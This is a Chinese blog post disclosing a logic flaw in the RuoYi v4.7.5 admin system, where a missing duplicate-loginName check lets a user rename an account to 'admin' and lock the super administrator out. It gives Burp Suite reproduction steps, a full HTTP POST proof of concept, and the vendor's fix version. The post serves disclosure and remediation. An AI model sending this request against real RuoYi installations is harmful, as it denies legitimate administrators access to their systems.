RuoYi 逻辑缺陷漏洞分析

最新推荐文章于 2024-06-17 10:27:38 发布
最新推荐文章于 2024-06-17 10:27:38 发布
阅读量2.3k 收藏 1
点赞数 1
分类专栏: 逻辑缺陷漏洞 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/afeng12345678/article/details/132028991
版权

RuoYi 逻辑缺陷漏洞分析

去年八月份挖的,已获得CNVD编号,近期准备跳槽决定拿出来水一下。

项目介绍

RuoYi 是一款基于SpringBoot的权限管理系统,易读易懂、界面简洁美观。核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用。

受影响版本:v4.7.5

官网:http://ruoyi.vip/
源码下载地址:https://gitee.com/y_project/RuoYi/tree/v4.7.5

漏洞分析

缺陷代码分析
文件位置:
ruoyi-admin/src/main/java/com/ruoyi/web/controller/system/SysUserController.java
函数名称:editSave
在这里插入图片描述

修改用户信息的editSave方法中,第171行checkUserAllowed方法首先禁止对userId=1的超级管理员进行信息修改,第172行checkUserDataScope方法判断当前用户的操作权限,接着判断手机号和邮箱账号是否已存在。可以看出,方法中并未对LoginName的值是否重复进行判断,因此可通过修改一个普通用户的LoginName的值与超级管理员相同,导致超级管理员无法登录系统。

漏洞复现步骤

1、系统默认两个用户(超级管理员:admin和测试用户ry),ry默认没有用户管理模块的数据操作权限,所以需要注册一个Test用户完成复现操作。
在这里插入图片描述

2、登录admin账号进入系统创建测试角色。进入系统管理——角色管理——新增,给角色赋予用户管理模块的权限。
在这里插入图片描述

3、进入系统管理——用户管理——添加用户,创建登录账号名为Test的用户(系统用户默认密码为123456),并赋予该用户刚才创建的测试角色。
在这里插入图片描述

4、登录Test用户进入系统后台,进入系统管理——用户管理,页面如下:
在这里插入图片描述

5、可以看到,出于安全的考虑,页面中默认是没有权限对admin用户进行数据操作的。
6、使用Burpsuite开启代理模式,再点击Test用户最右边的操作按钮,下拉选择”修改“,在弹出的修改用户窗口中随机修改一个字段的值,点击确定后获取到数据包(/system/user/edit)如下:
在这里插入图片描述

7、修改数据包 /dev-api/yunze/agent 中的loginName的值为admin,点击发包后返回结果如下:
在这里插入图片描述

8、进入数据库sys_user表中查看修改后的数据如下:
在这里插入图片描述

9、现在已经有两个admin用户了,当再次使用admin登录系统时就会报错,导致登陆失败。

在这里插入图片描述
在这里插入图片描述

漏洞复现完成,POC如下:

POST /system/user/edit HTTP/1.1
Host: localhost
Content-Length: 237
sec-ch-ua: " Not A;Brand";v=“99”, “Chromium”;v=“104”
Accept: application/json, text/javascript, /; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: “Windows”
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/user/edit/100
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=bec1d37c-5726-4ba7-adb5-6be95eee14f7
Connection: close

userId=100&deptId=100&userName=Test&dept.deptName=%E8%8B%A5%E4%BE%9D%E7%A7%91%E6%8A%80&phonenumber=15100000000&email=Test%40163.com&loginName=admin&sex=0&role=100&remark=%E6%B5%8B%E8%AF%95%E7%94%A8%E6%88%B7&status=0&roleIds=100&postIds=4

修复建议

目前,官方已发布新版本修复本漏洞,请升级到 4.7.6 或更高版本。
修复commit:https://gitee.com/y_project/RuoYi/commit/e337f685bc7d5e3729f1516c0a072b99408ce43a。
在这里插入图片描述

hkyj
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
RuoYi-activitiRuoYi-activitiRuoYi-activiti
06-24
4. 监控与分析:利用RuoYi-Activiti的监控功能,可以查看流程实例的执行轨迹,分析流程瓶颈,优化业务流程。 五、Spring-activiti整合 Spring-activiti是将Activiti与Spring框架集成的模块,使得在Spring环境中...
RuoYiCloud.rar
08-20
RuoYiCloud】是一个基于Java开发的企业级云平台,它提供了丰富的功能,包括但不限于权限管理、工作流程、报表统计、任务调度等,旨在帮助企业快速构建自己的业务系统。本压缩包“RuoYiCloud.rar”包含了该平台的...
若依系统前后台漏洞大全
热门推荐
FY10033的博客
08-07 4万+
漏洞影响范围RuoYi
渗透测试--实战若依ruoyi框架
qq_53003652的博客
11-16 4914
最近在挖某src的时候,碰到了一套若依,本以为啥都没有,结果随手一测若依存在的历史漏洞基本都有。是通过很奇怪的信息收集方式找到这个站的,分享出来让大家看看。老司机一看就明白了我在找什么,虽然说机会不大,但偏偏就让我遇到了。
【渗透利器】RuoYI漏洞综合利用工具
Fly_鹏程万里
06-17 772
若依综合利用工具支持检测若依框架多个历史漏洞,并且支持一键利用(Snakeyaml命令执行漏洞、Snakeyaml命令执行漏洞绕过、JdbcTemplate漏洞、ReadFile(新)文件读取漏洞、Readfile(老)文件读取漏洞、Thymeleaf模板注入漏洞及多个SQL注入洞、Shiro反序列化)
Ruoyi-Vue 源代码
06-29
它采用了MVC模式,将业务逻辑、数据和视图分离,使得代码结构清晰,易于维护。Vue.js作为前端框架,提供了响应式的数据绑定和组件化功能,大大提高了开发效率。 1. **Vue.js框架**:Vue.js是一个轻量级但功能强大的...
RuoYi开发手册(离线版)
07-21
RuoYi开发手册(离线版)》是一份专为开发者提供的详尽指南,主要涵盖了RuoYi框架的使用、配置、开发以及优化等多个方面。RuoYI是一个基于Spring Boot的企业级快速开发平台,旨在提高开发效率,减少重复工作。以下...
ruoyi框架宝典一.docx
08-24
Ruoyi框架是一款基于Spring Boot开发的企业级快速开发平台,其特点是模块化、组件化,提供了丰富的后台管理功能。本文将深入讲解Ruoyi框架的基础知识,包括项目的启动、动态模板引擎Velocity的应用、代码生成机制,...
基于Vue的RuoYi APP移动端框架设计源码
04-08
RuoYi APP移动端框架:基于Java开发,包含349个文件,包括89个Markdown文档、88个Vue组件文件、80个JSON配置文件、53个JavaScript文件、16个SCSS样式文件、8个PNG图像文件、4个JPG图像文件、3个CSS样式文件、2个TTF...
RuoYi-管理系统资源
最新发布
07-20
SpringBoot SpringMyBatisShiro
RuoYi-v4.7.7.zip
10-24
"RuoYi"是一个广泛使用的开源中国企业管理软件框架,其版本号为4.7.7的压缩包文件名为“RuoYi-v4.7.7.zip”。这个框架主要针对企业的信息化管理需求,提供了丰富的功能模块,如权限管理、工作流引擎、报表统计等,...
RuoYi-v4.7.7.tar.gz
10-24
1. **源代码**:RuoYi 的核心业务逻辑和框架组件,通常分为前端(可能基于 Vue.js 或其他前端框架)和后端(基于 Spring Boot 或相关 Java 技术栈)两部分。 2. **配置文件**:如 `application.properties` 或 `...
RuoYi前后端不分离项目整合LDAP
07-06
基于RuoYi框架,使用的是ruoyi前后端不分离的版本,实现对LDAP的整合 基于RuoYi框架,使用的是ruoyi前后端不分离的版本,实现对LDAP的整合 基于RuoYi框架,使用的是ruoyi前后端不分离的版本,实现对LDAP的整合 基于...
RuoYi-activiti-ruoyi-activiti.zip
01-19
在使用 RuoYi-Activiti 的过程中,开发者可以利用其提供的 API 和 SDK 进行开发,实现与后端服务的交互,创建自定义业务逻辑。同时,系统管理员可以通过管理后台配置流程实例、分配任务、查看历史记录等,全面掌握...
RuoYi-fast_java_RuoYi后台管理系统_
09-30
每个模块都封装了特定的业务逻辑,降低了模块间的耦合度。 4. **前后端分离**: RuoYi-fast采用了前后端分离的架构,前端通常使用Vue.js或React.js等现代JavaScript框架进行开发,与后端通过RESTful API进行通信。...
RuoYi-Cloud.zip
04-08
RuiYi微服务版本落地实现
ruoyi 资源,仅供学习。不做商用
08-08
Ruoyi是一款基于Java开发的企业级管理信息系统框架,它的核心目标是为开发者提供快速开发工具,简化企业级应用的开发过程。"ruoyi 资源,仅供学习。不做商用"这一标题和描述提示我们,这是一个用于学习目的的开源...
ruoyi-postgresql设置自增序列.sql
09-10
ruoyi框架集成postgresql,对自增表设置序列
若依(ruoyi)框架包名修改器
12-28
《若依(ruoyi)框架包名修改器详解》 若依(Ruoyi)框架,作为国内广受欢迎的企业级Java快速开发平台,以其高效、便捷的特点深受开发者喜爱。然而,随着项目的深入,有时我们需要对项目的包名进行调整,以满足特定...
ruoyi-vue3代码分析
07-28
很抱歉,我无法提供关于ruoyi-vue3代码的分析。我只能根据提供的引用内容回答问题。如果您有其他问题,我会尽力帮助您。 #### 引用[.reference_title] - *1* [若依V3 | RuoYi-Vue3-JS Doc](https://blog.csdn.net/qq_41499782/article/details/120941692)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [开源项目学习:若依RuoYi-Vue后台管理系统【基于ruoyi-vue开发新项目】](https://blog.csdn.net/Hugh_marin/article/details/124991712)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [RuoYi-Vue】RuoYi-Vue新增子模块](https://blog.csdn.net/weixin_40879055/article/details/125019938)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值